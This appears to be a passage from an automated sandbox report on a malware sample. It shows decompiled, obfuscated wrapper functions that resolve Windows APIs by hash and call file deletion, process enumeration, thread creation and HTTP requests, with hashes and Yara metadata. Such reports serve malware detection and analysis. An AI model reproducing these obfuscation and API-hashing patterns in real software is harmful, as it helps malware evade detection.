                                              0x002237aa
                                              0x002237b1
                                              0x002237b8
                                              0x002237bf
                                              0x002237c6
                                              0x002237d2
                                              0x002237da
                                              0x002237e2
                                              0x002237f6
                                              0x0022380a
                                              0x00223810

                                              APIs
                                              • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0022380A
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: InformationVolume
                                              • String ID:
                                              • API String ID: 2039140958-0
                                              • Opcode ID: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
                                              • Instruction ID: 5ee82ca949d1aee56ee8e80e297e22f81099bd8685696a5975c5e11bf8fea26e
                                              • Opcode Fuzzy Hash: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
                                              • Instruction Fuzzy Hash: 6D1117B1802219BBCF55DF95DD098DF7EB9EF49360F104048F90862160C3B14A64DBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0021B566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 31%
                                              			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0021602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                              0x0021b569
                                              0x0021b56a
                                              0x0021b56d
                                              0x0021b572
                                              0x0021b574
                                              0x0021b577
                                              0x0021b57a
                                              0x0021b57d
                                              0x0021b580
                                              0x0021b583
                                              0x0021b586
                                              0x0021b587
                                              0x0021b58a
                                              0x0021b58d
                                              0x0021b590
                                              0x0021b593
                                              0x0021b594
                                              0x0021b595
                                              0x0021b59a
                                              0x0021b5a4
                                              0x0021b5b8
                                              0x0021b5c0
                                              0x0021b5c4
                                              0x0021b5cb
                                              0x0021b5d2
                                              0x0021b5d9
                                              0x0021b5e6
                                              0x0021b5fd
                                              0x0021b604

                                              APIs
                                              • CreateFileW.KERNEL32(A45C8003,?,9C67384B,00000000,0ADDA027,53345D77,00000000), ref: 0021B5FD
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
                                              • Instruction ID: 8c5b0151ff509629f37df0858bbc5671548eea907959aa7da7d1092e1be52d2d
                                              • Opcode Fuzzy Hash: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
                                              • Instruction Fuzzy Hash: 4211C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002236D3, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 37%
                                              			E002236D3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t23;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				signed int _t34;
				void* _t41;

				_t41 = __edx;
				_t32 = __ecx;
				E0021602B(_t23);
				_v28 = 0x12ca0f;
				asm("stosd");
				asm("stosd");
				_t34 = 0x2d;
				asm("stosd");
				_v8 = 0xdb27;
				_v8 = _v8 >> 9;
				_v8 = _v8 / _t34;
				_v8 = _v8 ^ 0x000020cb;
				_v12 = 0x489;
				_v12 = _v12 | 0x46cddb89;
				_v12 = _v12 ^ 0x46cde771;
				_t30 = E002207A9(0x9dd48097, 0x9164b7cc, _t34, _t34, 0x113);
				_t31 =  *_t30(_t32, _t41, __ecx, __edx, _a4, _a8); // executed
				return _t31;
			}













                                              0x002236df
                                              0x002236e1
                                              0x002236e8
                                              0x002236ed
                                              0x002236fc
                                              0x00223701
                                              0x00223702
                                              0x00223709
                                              0x0022370a
                                              0x00223711
                                              0x0022371b
                                              0x00223723
                                              0x0022372f
                                              0x00223736
                                              0x0022373d
                                              0x0022374a
                                              0x00223754
                                              0x0022375c

                                              APIs
                                              • ProcessIdToSessionId.KERNEL32(00000000,00000000,?,?,?,?,00000000,1B7BC3FB,?), ref: 00223754
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ProcessSession
                                              • String ID:
                                              • API String ID: 3779259828-0
                                              • Opcode ID: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
                                              • Instruction ID: 6461a1f630e964e82f15e516939f9254603a8137e89e25e376d621d476c35d7a
                                              • Opcode Fuzzy Hash: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
                                              • Instruction Fuzzy Hash: 55019675A01208FBEB04DBA9DC469DFFFB4EF44364F104059E604A7251D7755F148BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00211132, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 37%
                                              			E00211132(void* __ecx, intOrPtr _a8, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, _Unknown_base(*)()* _a32) {
				unsigned int _v8;
				signed int _v12;
				void* _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E0021602B(_t27);
				_v12 = 0xe2c5;
				_v12 = _v12 * 0x1f;
				_v12 = _v12 | 0x070d55ff;
				_v12 = _v12 ^ 0x071f7e34;
				_v8 = 0x91c3;
				_v8 = _v8 + 0xffff5023;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x7e1e17b8;
				E002207A9(0x4bc4bb1d, 0x9164b7cc, __ecx, __ecx, 0x235);
				_t33 = CreateThread(0, 0, _a32, _a16, 0, 0); // executed
				return _t33;
			}







                                              0x00211135
                                              0x00211136
                                              0x0021113a
                                              0x0021113b
                                              0x0021113e
                                              0x00211141
                                              0x00211144
                                              0x00211147
                                              0x0021114a
                                              0x0021114b
                                              0x0021114e
                                              0x0021114f
                                              0x00211150
                                              0x00211151
                                              0x00211156
                                              0x0021116f
                                              0x00211172
                                              0x00211179
                                              0x00211180
                                              0x00211187
                                              0x0021118e
                                              0x00211192
                                              0x00211195
                                              0x002111a8
                                              0x002111ba
                                              0x002111c0

                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 002111BA
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
                                              • Instruction ID: 4b84943b2a5f212faa2bb5f1f823e8a26441cc87cecb8c779123746be414363b
                                              • Opcode Fuzzy Hash: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
                                              • Instruction Fuzzy Hash: 09012772802229BBCF15DFE5DD49CCFBFB9EF09254F104188F90962250D2729A60DBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00228422, Relevance: 1.5, APIs: 1, Instructions: 46networkCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E00228422(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, void* _a12, long _a16, intOrPtr _a24, void* _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t33;
				int _t40;

				_push(_a28);
				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t33);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x2f14d8;
				_v24 = 0x27cc4d;
				_v8 = 0xcfda;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x1b;
				_v8 = _v8 ^ 0xd01d7588;
				_v8 = _v8 ^ 0xdae8f2b7;
				_v12 = 0x64c6;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x001c0252;
				E002207A9(0x234ee083, 0x1f801b8, __ecx, __ecx, 0x11c);
				_t40 = HttpSendRequestW(_a12, _a8, 0xffffffff, _a28, _a16); // executed
				return _t40;
			}











                                              0x00228428
                                              0x0022842b
                                              0x0022842e
                                              0x00228430
                                              0x00228433
                                              0x00228436
                                              0x00228439
                                              0x0022843d
                                              0x0022843e
                                              0x00228443
                                              0x0022844a
                                              0x00228453
                                              0x0022845a
                                              0x00228461
                                              0x00228468
                                              0x0022847c
                                              0x0022847f
                                              0x00228486
                                              0x0022848d
                                              0x00228498
                                              0x0022849b
                                              0x002284a8
                                              0x002284be
                                              0x002284c3

                                              APIs
                                              • HttpSendRequestW.WININET(00000000,00000000,000000FF,?,0027CC4D), ref: 002284BE
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: HttpRequestSend
                                              • String ID:
                                              • API String ID: 360639707-0
                                              • Opcode ID: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
                                              • Instruction ID: 8fd7a91687c2144d63f024c3a4b8d51662b44ae4d62efbafc4b36ad4e9d4cd61
                                              • Opcode Fuzzy Hash: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
                                              • Instruction Fuzzy Hash: 8A1116B180120DFFCF05DF94CD469EEBFB6BB44314F208288F924662A1C3768B249B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                              0x00229821
                                              0x00229822
                                              0x00229825
                                              0x00229828
                                              0x0022982a
                                              0x0022982c
                                              0x0022982f
                                              0x00229832
                                              0x00229835
                                              0x00229836
                                              0x00229837
                                              0x0022983c
                                              0x00229855
                                              0x00229858
                                              0x0022985f
                                              0x00229866
                                              0x0022986d
                                              0x00229874
                                              0x0022987b
                                              0x0022988e
                                              0x0022989b
                                              0x002298a2

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00001000,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
                                              • Instruction ID: 136ff4b73406eac4840e75f5a7c5c464a2f8124889a7d21b5cd232603915ad96
                                              • Opcode Fuzzy Hash: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
                                              • Instruction Fuzzy Hash: C2014876801208BBDB04EFD5D8468DFBFB9EF85750F108199F918A6220E6715A619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00229AC7, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E00229AC7(void* __ecx, void* __edx, struct tagPROCESSENTRY32W _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				void* _t26;
				int _t33;
				signed int _t35;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0021602B(_t26);
				_v12 = 0x3a37;
				_t35 = 0x5f;
				_v12 = _v12 / _t35;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x0000271a;
				_v8 = 0x41ad;
				_v8 = _v8 ^ 0xae17da57;
				_v8 = _v8 + 0xffff40f3;
				_v8 = _v8 ^ 0xae16a338;
				E002207A9(0xfb40698d, 0x9164b7cc, _t35, _t35, 0x16d);
				_t33 = Process32NextW(_a12, _a4); // executed
				return _t33;
			}








                                              0x00229acc
                                              0x00229acf
                                              0x00229ad2
                                              0x00229ad7
                                              0x00229adf
                                              0x00229aed
                                              0x00229af5
                                              0x00229afd
                                              0x00229b01
                                              0x00229b08
                                              0x00229b0f
                                              0x00229b16
                                              0x00229b1d
                                              0x00229b31
                                              0x00229b3f
                                              0x00229b44

                                              APIs
                                              • Process32NextW.KERNEL32(DDC40DBA,0000271A), ref: 00229B3F
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: NextProcess32
                                              • String ID:
                                              • API String ID: 1850201408-0
                                              • Opcode ID: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
                                              • Instruction ID: acaf0973c433de6aa4929ae067b49f5e7db0ae40e32cb59fb832e991e1a3cf4b
                                              • Opcode Fuzzy Hash: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
                                              • Instruction Fuzzy Hash: 05014BB1910208BFEF04DFA4CC4A8EEBFB5EF44350F108098F509A6291D7B25B609F50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00217663, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E00217663(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				intOrPtr* _t26;
				void* _t27;

				E0021602B(_t22);
				_v12 = 0xe6d;
				_v12 = _v12 | 0x830368b1;
				_v12 = _v12 ^ 0x83037da7;
				_v8 = 0xe4f2;
				_v8 = _v8 << 0xc;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xc9e423b1;
				_t26 = E002207A9(0xeb8f70d2, 0x9164b7cc, __ecx, __ecx, 0xc5);
				_t27 =  *_t26(_a4, 0, _a8, _a12, __ecx, __edx, _a4, _a8, _a12, 0, _a20, __ecx, __ecx); // executed
				return _t27;
			}








                                              0x00217678
                                              0x0021767d
                                              0x00217687
                                              0x00217693
                                              0x0021769a
                                              0x002176a1
                                              0x002176a5
                                              0x002176a9
                                              0x002176c2
                                              0x002176d5
                                              0x002176da

                                              APIs
                                              • QueryFullProcessImageNameW.KERNEL32(83037DA7,00000000,?,?,?,?,?,?,0021620E,00000000,?,?), ref: 002176D5
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FullImageNameProcessQuery
                                              • String ID:
                                              • API String ID: 3578328331-0
                                              • Opcode ID: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
                                              • Instruction ID: 584d2144a991e02104d9f7f4e080d6e6e909b8f5236a56d987d45d40d94e1fcc
                                              • Opcode Fuzzy Hash: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
                                              • Instruction Fuzzy Hash: 0401467690020CBFEF059F90CC0AAAEBFB5EB44700F108188FA1426261D2B29A609B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                              0x0022aa3f
                                              0x0022aa40
                                              0x0022aa41
                                              0x0022aa44
                                              0x0022aa47
                                              0x0022aa4b
                                              0x0022aa4c
                                              0x0022aa51
                                              0x0022aa5b
                                              0x0022aa64
                                              0x0022aa68
                                              0x0022aa6f
                                              0x0022aa76
                                              0x0022aa8d
                                              0x0022aa90
                                              0x0022aa9d
                                              0x0022aaa8
                                              0x0022aaad

                                              APIs
                                              • DeleteFileW.KERNEL32(?,?,?,?,A6E18774,?,?), ref: 0022AAA8
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
                                              • Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
                                              • Opcode Fuzzy Hash: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
                                              • Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00229A56, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E00229A56(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				void* _t29;

				_t29 = __ecx;
				E0021602B(_t18);
				_v12 = 0x9a38;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x00004339;
				_v8 = 0x299d;
				_v8 = _v8 + 0xa1ce;
				_v8 = _v8 | 0xc5f89a67;
				_v8 = _v8 + 0x125d;
				_v8 = _v8 ^ 0xc5f8b599;
				_t22 = E002207A9(0x9f217491, 0x9164b7cc, __ecx, __ecx, 0x24e);
				_t23 =  *_t22(_t29, __ecx, __edx, _a4, _t28, __ecx, __ecx); // executed
				return _t23;
			}










                                              0x00229a5f
                                              0x00229a63
                                              0x00229a68
                                              0x00229a72
                                              0x00229a7b
                                              0x00229a82
                                              0x00229a89
                                              0x00229a90
                                              0x00229a97
                                              0x00229a9e
                                              0x00229ab7
                                              0x00229ac0
                                              0x00229ac6

                                              APIs
                                              • GetNativeSystemInfo.KERNEL32(?), ref: 00229AC0
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: InfoNativeSystem
                                              • String ID:
                                              • API String ID: 1721193555-0
                                              • Opcode ID: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
                                              • Instruction ID: 641f0eb2095e0b7479c13652eaae4444ce77416a7398eee16f811346fa2c38cc
                                              • Opcode Fuzzy Hash: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
                                              • Instruction Fuzzy Hash: 28F037B1911218FFEB08DB94E94A8DEBAB8EF55314F108088F40466241E7B51F648BA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00215FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E00215FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002207A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                              0x00215fb5
                                              0x00215fb6
                                              0x00215fb7
                                              0x00215fbb
                                              0x00215fbc
                                              0x00215fc1
                                              0x00215fcb
                                              0x00215fd7
                                              0x00215fde
                                              0x00215fe5
                                              0x00215ffc
                                              0x00215fff
                                              0x00216006
                                              0x0021600d
                                              0x0021601a
                                              0x00216025
                                              0x0021602a

                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00216025
                                              Memory Dump Source
                                              • Source File: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                              • Associated: 0000000F.00000002.2352648248.0000000000210000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000F.00000002.2352666263.000000000022C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
                                              • Instruction ID: 5d995ea7630725837acdc99d8627ad3ff9cdb75dcbb2e3a096d8fe34c137cd10
                                              • Opcode Fuzzy Hash: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
                                              • Instruction Fuzzy Hash: C9F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F20819CE409A7260E7715F559F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions